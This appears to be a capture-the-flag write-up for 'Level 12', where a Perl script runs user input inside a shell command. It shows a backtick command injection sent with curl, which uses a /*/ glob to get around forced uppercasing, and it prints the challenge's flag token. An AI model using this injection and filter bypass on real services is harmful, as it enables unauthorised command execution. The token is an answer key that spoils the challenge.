## Level 12

We have a perl script that executes a command with user input inside of it.  
The exploit could be trivial, but the input is capitalized and spaces are removed

The astuce here is to set a script in the folder tmp to be able to call getflag, but the script has to be in caps.  
In order to bypass the fact that we cannot put the script on / and cannot call /tmp/SCRIPT directly, cause of caps,
we call /*/SCRIPT, which works

```bash
$> chmod 755 /tmp/SCRIPT
$> cat > /tmp/SCRIPT
#! /bin/sh

getflag > /tmp/toto
```

```bash
$> curl localhost:4646?x='`/*/script`'
$> cat /tmp/toto
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```